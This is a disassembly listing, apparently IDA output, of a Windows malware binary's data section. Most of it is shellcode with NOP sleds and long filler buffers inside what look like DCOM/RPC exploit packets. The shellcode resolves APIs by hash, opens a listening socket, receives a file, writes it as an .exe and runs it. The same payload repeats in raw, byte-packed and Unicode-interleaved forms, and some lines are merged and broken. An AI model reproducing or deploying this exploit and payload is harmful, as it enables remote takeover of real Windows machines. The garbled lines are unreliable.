dd 6C642E77h, 7262006Ch, 6573776Fh, 642E6975h, 77006C6Ch
dd 732E7777h, 6D726174h, 652E6E61h, 77770065h, 66692E77h
dd 65652Eh, 0
dd 0Ch, 0
aCreateservicea db 'CreateServiceA',0
aOpenscmanagera db 'OpenSCManagerA',0
aOpenservicea db 'OpenServiceA',0
aChangeservicec db 'ChangeServiceConfig2A',0
aControlservice db 'ControlService',0
aCloseserviceha db 'CloseServiceHandle',0
aDeleteservice db 'DeleteService',0
aStartservicea db 'StartServiceA',0
aQueryservicest db 'QueryServiceStatus',0
aStartservicect db 'StartServiceCtrlDispatcherA',0
aRegisterservic db 'RegisterServiceCtrlHandlerA',0
aSetservicestat db 'SetServiceStatus',0
align 4
dd 8 dup(0)
db 3 dup(0)
byte_4163BB db 0 ; DATA XREF: sub_408DC0+6D3�o
dd 2 dup(0)
dd 0BC000000h, 0CB004148h, 0DA004148h, 0E7004148h, 0FD004148h
dd 0C004148h, 1F004149h, 2D004149h, 3B004149h, 4E004149h
dd 6A004149h, 86004149h, 47004149h, 61626F6Ch, 67325C6Ch
dd 73676B6Ah, 7167716Ah, 180E0C00h, 9083827Ch, 0C8C7C3C1h
dd 0CCCBCAC9h, 0D3D2D1CFh, 0D9D8D5D4h, 0DDDCDBDAh, 3C3B3ADEh
dd 403F3E3Dh, 44434241h, 51504845h, 57545352h, 69FF5958h
dd 2E706D63h, 6C6C64h, 706D6349h, 61657243h, 69466574h
dd 4900656Ch, 53706D63h, 45646E65h, 6F6863h, 706D6349h
dd 73726150h, 70655265h, 7365696Ch, 6D634900h, 6F6C4370h
dd 61486573h, 656C646Eh, 0D732500h, 7325000Ah, 64253Ah
dd 253A7325h, 61420064h, 65646362h, 69686766h, 6D6C6B6Ah
dd 71706F6Eh, 75747372h, 62617776h, 66656463h, 696867h
dd 60005h, 1, 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(5D0h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 5A0h, 598h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 598h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 2E8h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 2 dup(0)
dd 15Eh, 0
db 5Eh
; ---------------------------------------------------------------------------
loc_416805: ; CODE XREF: .data:00416837�j
add [eax], eax
add [eax+eax+5Ch], bl
add [esi+0], al
pop eax
add [esi+0], cl
inc edx
add [esi+0], al
pop eax
add [esi+0], al
pop eax
add [esi+0], cl
inc edx
add [esi+0], al
pop eax
add [esi+0], al
pop eax
add [esi+0], al
pop eax
add [esi+0], al
pop eax
add dh, al
push ss
add [ecx], al
loc_416834: ; CODE XREF: .data:00416835�j
int 3 ; Trap to Debugger
loopne loc_416834
jg short loc_416805
; ---------------------------------------------------------------------------
db 0E0h, 0FDh, 7Fh
db 0B3h dup(90h)
; ---------------------------------------------------------------------------
add esp, 0FFFFEFFFh
inc esp
jmp short loc_4168FA
; ---------------------------------------------------------------------------
loc_4168F8: ; CODE XREF: .data:loc_4168FA�p
jmp short loc_416965
; ---------------------------------------------------------------------------
loc_4168FA: ; CODE XREF: .data:004168F6�j
call loc_4168F8
push ebx
push ebp
push esi
push edi
mov ebp, [esp+18h]
mov eax, [ebp+3Ch]
mov edx, [eax+ebp+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_416918: ; CODE XREF: .data:00416935�j
jecxz short loc_41694C
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_416923: ; CODE XREF: .data:0041692F�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_416931
ror edi, 0Dh
add edi, eax
jmp short loc_416923
; ---------------------------------------------------------------------------
loc_416931: ; CODE XREF: .data:00416928�j
cmp edi, [esp+14h]
jnz short loc_416918
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_41694E
; ---------------------------------------------------------------------------
loc_41694C: ; CODE XREF: .data:loc_416918�j
xor eax, eax
loc_41694E: ; CODE XREF: .data:0041694A�j
pop edi
pop esi
pop ebp
pop ebx
mov [esp+4], eax
mov eax, [esp]
mov [esp+8], eax
mov eax, [esp+4]
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_416965: ; CODE XREF: .data:loc_4168F8�j
pop esi
push 30h
pop ecx
mov ebx, fs:[ecx]
mov ebx, [ebx+0Ch]
mov ebx, [ebx+1Ch]
mov ebx, [ebx]
mov edi, [ebx+8]
sub esp, 1Ch
mov ebp, esp
xor eax, eax
push eax
push 6578652Eh
mov [ebp+14h], esp
push edi
push 0E88A49EAh
call esi
push 6
push dword ptr [ebp+14h]
call eax
mov [ebp+4], eax
push edi
push 0E9238ADBh
call esi
mov [ebp+0Ch], eax
push edi
push 0EC0E4E8Eh
call esi
xor ecx, ecx
mov cx, 6C6Ch
push ecx
push 642E3233h
push 5F327377h
push esp
call eax
mov ebx, eax
push ebx
push 0E71819B6h
call esi
mov [ebp+10h], eax
push ebx
push 79C679E7h
call esi
mov [ebp+18h], eax
push ebx
push 492F0B6Eh
setalc
push 6
push 1
push 2
call eax
mov [ebp+8], eax
xor eax, eax
push eax
push eax
push eax
mov eax, 427FF02h
xor ah, 0FFh
push eax
mov eax, esp
push 10h
push eax
push dword ptr [ebp+8]
push ebx
push 0C7701AA4h
call esi
call eax
pop eax
push ebx
push 0E92EADA4h
call esi
push 10h
push dword ptr [ebp+8]
call eax
xor eax, eax
push eax
push eax
push dword ptr [ebp+8]
push ebx
push 498649E5h
call esi
call eax
mov ecx, [ebp+8]
mov [ebp+8], eax
push ecx
call dword ptr [ebp+18h]
add esp, 0FFFFFEFCh
mov ebx, esp
loc_416A3D: ; CODE XREF: .data:00416A56�j
xor ecx, ecx
push ecx
mov cl, 0FFh
push ecx
push ebx
push dword ptr [ebp+8]
call dword ptr [ebp+10h]
test eax, eax
jle short loc_416A58
push eax
push ebx
push dword ptr [ebp+4]
call dword ptr [ebp+0Ch]
jmp short loc_416A3D
; ---------------------------------------------------------------------------
loc_416A58: ; CODE XREF: .data:00416A4C�j
push dword ptr [ebp+8]
call dword ptr [ebp+18h]
push edi
push 0DD1A4C5Bh
call esi
push dword ptr [ebp+4]
call eax
xor eax, eax
push eax
push dword ptr [ebp+14h]
push edi
push 0E8AFE98h
call esi
call eax
push edi
push 60E0CEEFh
call esi
call eax
nop
nop
pop esp
add [ebx+0], al
and al, 0
pop esp
add [ecx], dh
add [edx], dh
add [ebx], dh
add [eax+eax], dh
xor eax, 31003600h
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [ecx], dh
add [esi], ch
add [eax+eax+6Fh], ah
add [ebx+0], ah
; ---------------------------------------------------------------------------
db 2 dup(0), 1
dd 0CC000810h, 20CCCCCCh, 30000000h, 2D00h, 88000000h
dd 2000C2Ah, 1000000h, 28000000h, 1000C8Ch, 7000000h, 0
dd 5000000h, 1000600h, 0
dd 32000000h, 0CCFD5824h, 0B0496445h, 74AEDD70h, 60D2962Ch
dd 1000D5Eh, 0
dd 70000000h, 2000D5Eh, 7C000000h, 0D5Eh, 10000000h, 80000000h
dd 2AF1F196h, 0A611CE4Dh, 0AF20006Ah, 0CF4726Eh, 4D000000h
dd 1425241h, 0
dd 0D000000h, 0BAADF0h, 0A8000000h, 0D0000BF4h, 0D0000005h
dd 4D000005h, 4574F45h, 0A2000000h, 1, 0C0000000h, 0
dd 38460000h, 3, 0C0000000h, 0
dd 460000h, 0A0000000h, 98000005h, 5, 1000000h, 0CC000810h
dd 0C8CCCCCCh, 4D000000h, 98574F45h, 0D8000005h, 0
dd 2000000h, 7000000h, 4 dup(0)
dd 0C4000000h, 6400CD28h, 0CD29h, 7000000h, 0B9000000h
dd 1, 0C0000000h, 0
dd 0AB460000h, 1, 0C0000000h, 0
dd 0A5460000h, 1, 0C0000000h, 0
dd 0A6460000h, 1, 0C0000000h, 0
dd 0A4460000h, 1, 0C0000000h, 0
dd 0AD460000h, 1, 0C0000000h, 0
dd 0AA460000h, 1, 0C0000000h, 0
dd 7460000h, 60000000h, 58000000h, 90000000h, 40000000h
dd 20000000h, 0E8000000h, 30000002h, 2 dup(1000000h), 0CC000810h
dd 50CCCCCCh, 4F000000h, 0FF2088B6h, 0FFFFFFh, 12h dup(0)
dd 1000000h, 0CC000810h, 48CCCCCCh, 7000000h, 6006600h
dd 209h, 0C0000000h, 0
dd 10460000h, 2 dup(0)
dd 1000000h, 0
dd 78000000h, 58000C19h, 5000000h, 1000600h, 70000000h
dd 989398D8h, 0A911D24Fh, 0B257BE3Dh, 32000000h, 1003100h
dd 0CC000810h, 80CCCCCCh, 0D000000h, 0BAADF0h, 3 dup(0)
dd 18000000h, 1443h, 2 dup(60000000h), 4D000000h, 4574F45h
dd 0C0000000h, 1, 0C0000000h, 0
dd 3B460000h, 3, 0C0000000h, 0
dd 460000h, 30000000h, 1000000h, 81000100h, 800317C5h
dd 994AE90Eh, 508AF199h, 2857A6Fh, 5 dup(0)
dd 2 dup(1000000h), 0CC000810h, 30CCCCCCh, 78000000h, 6E00h
dd 0D8000000h, 0DDAh, 0
dd 20000000h, 0C2Fh, 0
dd 3000000h, 0
dd 3000000h, 46000000h, 5800h, 1000000h, 0CC000810h, 10CCCCCCh
dd 30000000h, 2E00h, 3 dup(0)
dd 1000000h, 0CC000810h, 68CCCCCCh, 0E000000h, 68FFFF00h
dd 2000B8Bh, 2 dup(0)
dd 5E000000h, 1, 5E000000h, 5C000001h, 46005C00h, 4E005800h
dd 46004200h, 46005800h, 4E005800h, 46004200h, 3 dup(46005800h)
dd 9D005800h, 0CC010013h, 0CC7FFDE0h, 907FFDE0h, 2Ch dup(90909090h)
dd 0C4819090h, 0FFFFEFFFh, 0EB02EB44h, 0FFF9E86Bh, 5553FFFFh
dd 6C8B5756h, 458B1824h, 28548B3Ch, 8BD50378h, 5A8B184Ah
dd 0E3DD0320h, 348B4932h, 33F5038Bh, 0C033FCFFh, 74E038ACh
dd 0DCFC107h, 0F2EBF803h, 14247C3Bh, 5A8BE175h, 66DD0324h
dd 8B4B0C8Bh, 0DD031C5Ah, 38B048Bh, 3302EBC5h, 5D5E5FC0h
dd 2444895Bh, 24048B04h, 8244489h, 424448Bh, 0C308C483h
dd 59306A5Eh, 8B198B64h, 5B8B0C5Bh, 8B1B8B1Ch, 0EC83087Bh
dd 33EC8B1Ch, 2E6850C0h, 89657865h, 68571465h, 0E88A49EAh
dd 66AD6FFh, 0FF1475FFh, 44589D0h, 8ADB6857h, 0D6FFE923h
dd 570C4589h, 0E4E8E68h, 33D6FFECh, 6CB966C9h, 3368516Ch
dd 68642E32h, 5F327377h, 8BD0FF54h, 0B66853D8h, 0FFE71819h
dd 104589D6h, 79E76853h, 0D6FF79C6h, 53184589h, 2F0B6E68h
dd 6AD6FF49h, 6A016A06h, 89D0FF02h, 0C0330845h, 0B8505050h
dd 427FF02h, 50FFF480h, 106AC48Bh, 875FF50h, 1AA46853h
dd 0D6FFC770h, 5358D0FFh, 2EADA468h, 6AD6FFE9h, 875FF10h
dd 0C033D0FFh, 75FF5050h, 0E5685308h, 0FF498649h, 8BD0FFD6h
dd 4589084Dh, 55FF5108h, 0FCC48118h, 8BFFFFFEh, 51C933DCh
dd 5351FFB1h, 0FF0875FFh, 0C0851055h, 53500A7Eh, 0FF0475FFh
dd 0E5EB0C55h, 0FF0875FFh, 68571855h, 0DD1A4C5Bh, 75FFD6FFh
dd 33D0FF04h, 75FF50C0h, 98685714h, 0FF0E8AFEh, 57D0FFD6h
dd 0E0CEEF68h, 0FFD6FF60h, 5C9090D0h, 24004300h, 31005C00h
dd 33003200h, 35003400h, 31003600h, 7 dup(31003100h), 64002E00h
dd 63006F00h, 1000000h, 0CC000810h, 20CCCCCCh, 30000000h
dd 2D00h, 88000000h, 2000C2Ah, 1000000h, 28000000h, 1000C8Ch
dd 7000000h, 0
dd 0EC000000h, 3, 0EC000000h, 90000003h, 27h dup(90909090h)
dd 81909090h, 0FFEFFFC4h, 2EB44FFh, 0F9E86BEBh, 53FFFFFFh
dd 8B575655h, 8B18246Ch, 548B3C45h, 0D5037828h, 8B184A8Bh
dd 0DD03205Ah, 8B4932E3h, 0F5038B34h, 33FCFF33h, 0E038ACC0h
dd 0CFC10774h, 0EBF8030Dh, 247C3BF2h, 8BE17514h, 0DD03245Ah
dd 4B0C8B66h, 31C5A8Bh, 8B048BDDh, 2EBC503h, 5E5FC033h
dd 44895B5Dh, 48B0424h, 24448924h, 24448B08h, 8C48304h
dd 306A5EC3h, 198B6459h, 8B0C5B8Bh, 1B8B1C5Bh, 83087B8Bh
dd 0EC8B1CECh, 6850C033h, 6578652Eh, 57146589h, 8A49EA68h
dd 6AD6FFE8h, 1475FF06h, 4589D0FFh, 0DB685704h, 0FFE9238Ah
dd 0C4589D6h, 4E8E6857h, 0D6FFEC0Eh, 0B966C933h, 68516C6Ch
dd 642E3233h, 32737768h, 0D0FF545Fh, 6853D88Bh, 0E71819B6h
dd 4589D6FFh, 0E7685310h, 0FF79C679h, 184589D6h, 0B6E6853h
dd 0D6FF492Fh, 16A066Ah, 0D0FF026Ah, 33084589h, 505050C0h
dd 27FF02B8h, 0FFF48004h, 6AC48B50h, 75FF5010h, 0A4685308h
dd 0FFC7701Ah, 58D0FFD6h, 0ADA46853h, 0D6FFE92Eh, 75FF106Ah
dd 33D0FF08h, 0FF5050C0h, 68530875h, 498649E5h, 0D0FFD6FFh
dd 89084D8Bh, 0FF510845h, 0C4811855h, 0FFFFFEFCh, 0C933DC8Bh
dd 51FFB151h, 875FF53h, 851055FFh, 500A7EC0h, 475FF53h
dd 0EB0C55FFh, 875FFE5h, 571855FFh, 1A4C5B68h, 0FFD6FFDDh
dd 0D0FF0475h, 0FF50C033h, 68571475h, 0E8AFE98h, 0D0FFD6FFh
dd 0CEEF6857h, 0D6FF60E0h, 9090D0FFh, 15Ch dup(90909090h)
dd 909090h, 90010046h, 2 dup(90909090h), 66909090h, 71CEC81h
dd 9090E4FFh, 2 dup(90909090h), 95909090h, 3004014h, 7C000000h
dd 1004070h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 7C000000h, 1004070h, 0
dd 1000000h, 0
dd 7C000000h, 1004070h, 0
dd 1000000h, 0
dd 7C000000h, 1004070h, 0
dd 1000000h, 0
db 0
db 2 dup(0), 78h
db 85h ; …
db 13h, 0, 0ABh
aJs111111111111 db '[¦é11111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111111111111111111111111111111111111111111111111111111'
db '11111111111111',0
aN_0 db '',0Dh,0
align 10h
dd 0AD000000h, 9000000Dh, 17Fh dup(90009000h)
db 0, 90h, 0
byte_4183C7 db 90h ; DATA XREF: sub_407B46+C1�o
dd 4 dup(90009000h)
db 0, 90h, 0
byte_4183DB db 90h ; DATA XREF: sub_407B46+A2�o
dd 90009000h
db 0, 90h, 0
byte_4183E3 db 90h ; DATA XREF: sub_407B46+83�o
dd 4 dup(90009000h)
db 0
byte_4183F5 db 90h ; DATA XREF: sub_407B46+32�o
align 4
dd 2 dup(90009000h)
db 0, 90h, 0
byte_418403 db 90h ; DATA XREF: sub_407B46+2D�o
dd 2 dup(90009000h)
dword_41840C dd 4Dh dup(90009000h) ; .data:00419F43�o ...
db 0, 90h, 0
byte_418543 db 90h ; DATA XREF: sub_4082A0+16�o
dd 0Dh dup(90009000h)
db 0, 90h, 0
byte_41857B db 90h ; DATA XREF: sub_4082A0+43�o
dd 13h dup(90009000h)
db 0, 90h, 0
byte_4185CB db 90h ; DATA XREF: sub_4082A0+7C�o
dd 9Fh dup(90009000h)
db 0, 90h, 0
byte_41884B db 90h ; DATA XREF: sub_407B46+162�o
dd 1Dh dup(90009000h)
dword_4188C0 dd 90009000h dword_4188C4 dd 4Dh dup(90009000h) ; rdata:0040A5C5�o
dword_4189F8 dd 1Ah dup(90009000h)dword_418A60 dd 5Ch dup(90009000h)byte_418BD0 db 0 ; DATA XREF: sub_40C140+1EC�r
; sub_40C140+210�r ...
db 90h
align 4
dd 3Fh dup(90009000h)
byte_418CD0 db 0 ; DATA XREF: sub_40C140+1C8�r
; sub_40C140+234�r ...
db 90h
align 4
dd 2Eh dup(90009000h), 3C009000h, 1C001200h, 90007500h
dd 5 dup(90009000h), 81009000h, 0FF00C400h, 0FF00EF00h
dd 4400FF00h, 200EB00h, 6B00EB00h, 0F900E800h, 0FF00FF00h
dd 5300FF00h
dword_418DD0 dd 56005500h ; sub_40D540:loc_40D777�w
dword_418DD4 dd 8B005700h ; sub_40C140+5A9�r ...
dd 24006C00h, 8B001800h, 3C004500h, 54008B00h, 78002800h
dd 0D5000300h, 4A008B00h, 8B001800h, 20005A00h, 0DD000300h
dd 3200E300h, 8B004900h, 8B003400h, 0F5000300h, 0FF003300h
dd 3300FC00h, 0AC00C000h, 0E0003800h, 7007400h, 0CF00C100h
dd 3000D00h, 0EB00F800h, 3B00F200h, 24007C00h, 75001400h
dd 8B00E100h, 24005A00h, 0DD000300h, 8B006600h, 4B000C00h
dd 5A008B00h, 3001C00h, 8B00DD00h, 8B000400h, 0C5000300h
dd 200EB00h, 0C0003300h, 5E005F00h, 5B005D00h, 44008900h
dd 4002400h, 4008B00h, 89002400h, 24004400h, 8B000800h
dd 24004400h, 83000400h, 800C400h, 5E00C300h, 30006A00h
dd 64005900h, 19008B00h, 5B008B00h, 8B000C00h, 1C005B00h
dd 1B008B00h, 7B008B00h, 83000800h, 1C00EC00h, 0EC008B00h
dd 0C0003300h, 68005000h, 65002E00h, 65007800h, 65008900h
dd 57001400h, 0EA006800h, 8A004900h, 0FF00E800h, 6A00D600h
dd 0FF000600h, 14007500h, 0D000FF00h, 45008900h, 57000400h
dd 0DB006800h, 23008A00h, 0FF00E900h, 8900D600h, 0C004500h
dd 68005700h, 4E008E00h, 0EC000E00h, 0D600FF00h, 0C9003300h
dd 0B9006600h, 6C006C00h, 68005100h, 32003300h, 64002E00h
dd 77006800h, 32007300h, 54005F00h, 0D000FF00h, 0D8008B00h
dd 68005300h, 1900B600h, 0E7001800h, 0D600FF00h, 45008900h
dd 53001000h, 0E7006800h, 0C6007900h, 0FF007900h, 8900D600h
dd 18004500h, 68005300h, 0B006E00h, 49002F00h, 0D600FF00h
dd 6006A00h, 1006A00h, 2006A00h, 0D000FF00h, 45008900h
dd 33000800h, 5000C000h, 50005000h, 200B800h, 2700FF00h
dd 80000400h, 0FF00F400h, 8B005000h, 6A00C400h, 50001000h
dd 7500FF00h, 53000800h, 0A4006800h, 70001A00h, 0FF00C700h
dd 0FF00D600h, 5800D000h, 68005300h, 0AD00A400h, 0E9002E00h
dd 0D600FF00h, 10006A00h, 7500FF00h, 0FF000800h, 3300D000h
dd 5000C000h, 0FF005000h, 8007500h, 68005300h, 4900E500h
dd 49008600h, 0D600FF00h, 0D000FF00h, 4D008B00h, 89000800h
dd 8004500h, 0FF005100h, 18005500h, 0C4008100h, 0FE00FC00h
dd 0FF00FF00h, 0DC008B00h, 0C9003300h, 0B1005100h, 5100FF00h
dd 0FF005300h, 8007500h, 5500FF00h, 85001000h, 7E00C000h
dd 50000A00h, 0FF005300h, 4007500h, 5500FF00h, 0EB000C00h
dd 0FF00E500h, 8007500h, 5500FF00h, 57001800h, 5B006800h
dd 1A004C00h, 0FF00DD00h, 0FF00D600h, 4007500h, 0D000FF00h
dd 0C0003300h, 0FF005000h, 14007500h, 68005700h, 0FE009800h
dd 0E008A00h, 0D600FF00h, 0D000FF00h, 68005700h, 0CE00EF00h
dd 6000E000h, 0D600FF00h, 0D000FF00h, 3Eh dup(90009000h)
dword_4191D4 dd 90009000h ; sub_40C140+5B0�r ...
dd 87h dup(90009000h), 0EB009000h, 0EB000600h, 3C000600h
dd 1C001200h, 90007500h, 3 dup(90009000h), 81009000h, 0FF00C400h
dd 0FF00EF00h, 4400FF00h, 200EB00h, 6B00EB00h, 0F900E800h
dd 0FF00FF00h, 5300FF00h, 56005500h, 8B005700h, 24006C00h
dd 8B001800h, 3C004500h, 54008B00h, 78002800h, 0D5000300h
dd 4A008B00h, 8B001800h, 20005A00h, 0DD000300h, 3200E300h
dd 8B004900h, 8B003400h, 0F5000300h, 0FF003300h, 3300FC00h
dd 0AC00C000h, 0E0003800h, 7007400h, 0CF00C100h, 3000D00h
dd 0EB00F800h, 3B00F200h, 24007C00h, 75001400h, 8B00E100h
dd 24005A00h, 0DD000300h, 8B006600h, 4B000C00h, 5A008B00h
dd 3001C00h, 8B00DD00h, 8B000400h, 0C5000300h, 200EB00h
dd 0C0003300h, 5E005F00h, 5B005D00h, 44008900h, 4002400h
dd 4008B00h, 89002400h, 24004400h, 8B000800h, 24004400h
dd 83000400h, 800C400h, 5E00C300h, 30006A00h, 64005900h
dd 19008B00h, 5B008B00h, 8B000C00h, 1C005B00h, 1B008B00h
dd 7B008B00h, 83000800h, 1C00EC00h, 0EC008B00h, 0C0003300h
dd 68005000h, 65002E00h, 65007800h, 65008900h, 57001400h
dd 0EA006800h, 8A004900h, 0FF00E800h, 6A00D600h, 0FF000600h
dd 14007500h, 0D000FF00h, 45008900h, 57000400h, 0DB006800h
dd 23008A00h, 0FF00E900h, 8900D600h, 0C004500h, 68005700h
dd 4E008E00h, 0EC000E00h, 0D600FF00h, 0C9003300h, 0B9006600h
dd 6C006C00h, 68005100h, 32003300h, 64002E00h, 77006800h
dd 32007300h, 54005F00h, 0D000FF00h, 0D8008B00h, 68005300h
dd 1900B600h, 0E7001800h, 0D600FF00h, 45008900h, 53001000h
dword_4195D4 dd 0E7006800h ; sub_40C140+5EF�r ...
dd 0C6007900h, 0FF007900h, 8900D600h, 18004500h, 68005300h
dd 0B006E00h, 49002F00h, 0D600FF00h, 6006A00h, 1006A00h
dd 2006A00h, 0D000FF00h, 45008900h, 33000800h, 5000C000h
dd 50005000h, 200B800h, 2700FF00h, 80000400h, 0FF00F400h
dd 8B005000h, 6A00C400h, 50001000h, 7500FF00h, 53000800h
dd 0A4006800h, 70001A00h, 0FF00C700h, 0FF00D600h, 5800D000h
dd 68005300h, 0AD00A400h, 0E9002E00h, 0D600FF00h, 10006A00h
dd 7500FF00h, 0FF000800h, 3300D000h, 5000C000h, 0FF005000h
dd 8007500h, 68005300h, 4900E500h, 49008600h, 0D600FF00h
dd 0D000FF00h, 4D008B00h, 89000800h, 8004500h, 0FF005100h
dd 18005500h, 0C4008100h, 0FE00FC00h, 0FF00FF00h, 0DC008B00h
dd 0C9003300h, 0B1005100h, 5100FF00h, 0FF005300h, 8007500h
dd 5500FF00h, 85001000h, 7E00C000h, 50000A00h, 0FF005300h
dd 4007500h, 5500FF00h, 0EB000C00h, 0FF00E500h, 8007500h
dd 5500FF00h, 57001800h, 5B006800h, 1A004C00h, 0FF00DD00h
dd 0FF00D600h, 4007500h, 0D000FF00h, 0C0003300h, 0FF005000h
dd 14007500h, 68005700h, 0FE009800h, 0E008A00h, 0D600FF00h
dd 0D000FF00h, 68005700h, 0CE00EF00h, 6000E000h, 0D600FF00h
dd 0D000FF00h, 5Dh dup(90009000h), 31313100h, 18h dup(31313131h)
dd 313131h, 9A000000h, 10040A8h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 1000000h, 0
dd 9A000000h, 10040A8h, 0
dd 1000000h, 0
dd 9A000000h, 10040A8h, 0
dd 1000000h, 0
dd 9A000000h, 10040A8h, 0
dd 1000000h, 0
dd 31000000h, 0Ch dup(31313131h)
dword_4199D4 dd 31313131h ; sub_40C140+62E�r ...
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
db 3 dup(31h)
db 31h ; 1
